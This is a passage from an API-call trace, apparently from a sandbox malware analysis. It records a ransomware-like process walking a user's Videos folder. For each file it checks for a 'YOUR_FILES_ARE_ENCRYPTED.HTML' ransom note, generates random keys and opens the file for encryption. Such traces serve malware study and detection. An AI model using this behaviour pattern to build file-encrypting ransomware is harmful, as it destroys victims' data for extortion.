wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\fdLgaB_0tvdqnpdx.mkv") returned 53 [0125.416] PathFindExtensionW (pszPath="fdLgaB_0tvdqnpdx.mkv") returned=".mkv" [0125.416] lstrlenW (lpString=".mkv") returned 4 [0125.416] PathFindExtensionW (pszPath="fdLgaB_0tvdqnpdx.mkv") returned=".mkv" [0125.416] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4865c20, ftCreationTime.dwHighDateTime=0x1d6fe63, ftLastAccessTime.dwLowDateTime=0xd20b2720, ftLastAccessTime.dwHighDateTime=0x1d70a1b, ftLastWriteTime.dwLowDateTime=0xd20b2720, ftLastWriteTime.dwHighDateTime=0x1d70a1b, nFileSizeHigh=0x0, nFileSizeLow=0x9fc6, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="FUWphB.mp4", cAlternateFileName="")) returned 1 [0125.416] StrStrIW (lpFirst="FUWphB.mp4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.416] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\FUWphB.mp4") returned 43 [0125.416] PathFindExtensionW (pszPath="FUWphB.mp4") returned=".mp4" [0125.416] lstrlenW (lpString=".mp4") returned 4 [0125.416] PathFindExtensionW (pszPath="FUWphB.mp4") returned=".mp4" [0125.416] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\FUWphB.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\fuwphb.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.417] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=40902) returned 1 [0125.417] GetProcessHeap () returned 0x600000 [0125.417] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.417] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="C2") returned 2 [0125.417] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="FB") returned 2 [0125.417] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="0A") returned 2 [0125.417] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="77") returned 2 [0125.417] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="7E") returned 2 [0125.417] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="F4") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="2C") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="6E") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="EA") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="6F") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="3E") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="83") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="55") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="F3") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="49") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="6B") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="86") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="E3") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="7D") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="53") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="5F") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="DA") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="41") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="4E") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="5B") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="A9") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="EA") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="4F") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="E9") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="89") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="68") returned 2 [0125.418] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="71") returned 2 [0125.419] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\FUWphB.mp4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\FUWphB.mp4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\FUWphB.mp4" [0125.419] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.419] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.421] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1f36440, ftCreationTime.dwHighDateTime=0x1d6fc36, ftLastAccessTime.dwLowDateTime=0x21ee6eb0, ftLastAccessTime.dwHighDateTime=0x1d7076e, ftLastWriteTime.dwLowDateTime=0x21ee6eb0, ftLastWriteTime.dwHighDateTime=0x1d7076e, nFileSizeHigh=0x0, nFileSizeLow=0x2d15, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="g4dmS.avi", cAlternateFileName="")) returned 1 [0125.421] StrStrIW (lpFirst="g4dmS.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.421] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\g4dmS.avi") returned 42 [0125.421] PathFindExtensionW (pszPath="g4dmS.avi") returned=".avi" [0125.421] lstrlenW (lpString=".avi") returned 4 [0125.421] PathFindExtensionW (pszPath="g4dmS.avi") returned=".avi" [0125.421] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\g4dmS.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\g4dms.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.425] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=11541) returned 1 [0125.425] GetProcessHeap () returned 0x600000 [0125.425] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.427] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="C6") returned 2 [0125.427] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="34") returned 2 [0125.427] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="67") returned 2 [0125.427] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="F5") returned 2 [0125.427] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="E7") returned 2 [0125.427] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="16") returned 2 [0125.427] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="80") returned 2 [0125.427] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="A2") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="A9") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="62") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="41") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="53") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="06") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="77") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="4C") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="E7") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="5F") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="1C") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="25") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="63") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="2E") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="71") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="14") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="FA") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="C5") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="9C") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="0C") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="B0") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="B6") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="93") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="06") returned 2 [0125.428] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="44") returned 2 [0125.429] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\g4dmS.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\g4dmS.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\g4dmS.avi" [0125.429] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.429] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.432] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10f5dd80, ftCreationTime.dwHighDateTime=0x1d7048c, ftLastAccessTime.dwLowDateTime=0x54037df0, ftLastAccessTime.dwHighDateTime=0x1d707e1, ftLastWriteTime.dwLowDateTime=0x54037df0, ftLastWriteTime.dwHighDateTime=0x1d707e1, nFileSizeHigh=0x0, nFileSizeLow=0x3f94, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="gJMhNeSP2s.avi", cAlternateFileName="GJMHNE~1.AVI")) returned 1 [0125.432] StrStrIW (lpFirst="gJMhNeSP2s.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.432] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\gJMhNeSP2s.avi") returned 47 [0125.433] PathFindExtensionW (pszPath="gJMhNeSP2s.avi") returned=".avi" [0125.433] lstrlenW (lpString=".avi") returned 4 [0125.433] PathFindExtensionW (pszPath="gJMhNeSP2s.avi") returned=".avi" [0125.433] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\gJMhNeSP2s.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\gjmhnesp2s.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.433] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=16276) returned 1 [0125.433] GetProcessHeap () returned 0x600000 [0125.433] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.434] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="CB") returned 2 [0125.434] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="67") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="45") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="F5") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="26") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="48") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="16") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="8F") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="9A") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="1C") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="22") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="3D") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="72") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="05") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="D7") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="8E") returned 2 [0125.434] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="6F") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="27") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="8E") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="1C") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="01") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="5E") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="73") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="B9") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="F8") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="E0") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="56") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="B3") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="13") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="0F") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="67") returned 2 [0125.435] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="71") returned 2 [0125.435] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\gJMhNeSP2s.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\gJMhNeSP2s.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\gJMhNeSP2s.avi" [0125.435] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.435] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.436] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fcf2e70, ftCreationTime.dwHighDateTime=0x1d709fc, ftLastAccessTime.dwLowDateTime=0x31c714c0, ftLastAccessTime.dwHighDateTime=0x1d709ff, ftLastWriteTime.dwLowDateTime=0x31c714c0, ftLastWriteTime.dwHighDateTime=0x1d709ff, nFileSizeHigh=0x0, nFileSizeLow=0x53d3, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="GXWs8A08dnRH7.mkv", cAlternateFileName="GXWS8A~1.MKV")) returned 1 [0125.439] StrStrIW (lpFirst="GXWs8A08dnRH7.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.439] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\GXWs8A08dnRH7.mkv") returned 50 [0125.439] PathFindExtensionW (pszPath="GXWs8A08dnRH7.mkv") returned=".mkv" [0125.439] lstrlenW (lpString=".mkv") returned 4 [0125.439] PathFindExtensionW (pszPath="GXWs8A08dnRH7.mkv") returned=".mkv" [0125.439] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a78d7d0, ftCreationTime.dwHighDateTime=0x1d7038b, ftLastAccessTime.dwLowDateTime=0x4945e5f0, ftLastAccessTime.dwHighDateTime=0x1d70945, ftLastWriteTime.dwLowDateTime=0x4945e5f0, ftLastWriteTime.dwHighDateTime=0x1d70945, nFileSizeHigh=0x0, nFileSizeLow=0x1f4d, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="H0_fl6.avi", cAlternateFileName="")) returned 1 [0125.439] StrStrIW (lpFirst="H0_fl6.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.439] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\H0_fl6.avi") returned 43 [0125.439] PathFindExtensionW (pszPath="H0_fl6.avi") returned=".avi" [0125.439] lstrlenW (lpString=".avi") returned 4 [0125.439] PathFindExtensionW (pszPath="H0_fl6.avi") returned=".avi" [0125.439] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\H0_fl6.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\h0_fl6.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.440] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=8013) returned 1 [0125.440] GetProcessHeap () returned 0x600000 [0125.440] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.441] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="90") returned 2 [0125.441] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="C2") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="9C") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="25") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="42") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="A5") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="9F") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="9C") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="F9") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="D8") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="EE") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="D3") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="8F") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="B2") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="B5") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="C9") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="1E") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="44") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="D1") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="1A") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="67") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="D6") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="07") returned 2 [0125.441] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="F5") returned 2 [0125.442] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="12") returned 2 [0125.442] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="3C") returned 2 [0125.442] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="16") returned 2 [0125.442] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="E1") returned 2 [0125.442] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="F7") returned 2 [0125.442] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="FB") returned 2 [0125.442] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="25") returned 2 [0125.442] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="7A") returned 2 [0125.442] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\H0_fl6.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\H0_fl6.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\H0_fl6.avi" [0125.442] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.442] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.446] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d42ba80, ftCreationTime.dwHighDateTime=0x1d708ed, ftLastAccessTime.dwLowDateTime=0xfa4ff720, ftLastAccessTime.dwHighDateTime=0x1d7092a, ftLastWriteTime.dwLowDateTime=0xfa4ff720, ftLastWriteTime.dwHighDateTime=0x1d7092a, nFileSizeHigh=0x0, nFileSizeLow=0xb2e7, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="ivlBW3u.avi", cAlternateFileName="")) returned 1 [0125.446] StrStrIW (lpFirst="ivlBW3u.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.446] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\ivlBW3u.avi") returned 44 [0125.446] PathFindExtensionW (pszPath="ivlBW3u.avi") returned=".avi" [0125.446] lstrlenW (lpString=".avi") returned 4 [0125.446] PathFindExtensionW (pszPath="ivlBW3u.avi") returned=".avi" [0125.446] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\ivlBW3u.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ivlbw3u.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.446] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=45799) returned 1 [0125.447] GetProcessHeap () returned 0x600000 [0125.447] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.447] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="A3") returned 2 [0125.447] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="20") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="F0") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="32") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="06") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="9B") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="1D") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="7D") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="67") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="09") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="0D") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="F5") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="F9") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="B9") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="08") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="73") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="1E") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="5D") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="B5") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="E3") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="25") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="74") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="79") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="1B") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="0D") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B9") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: 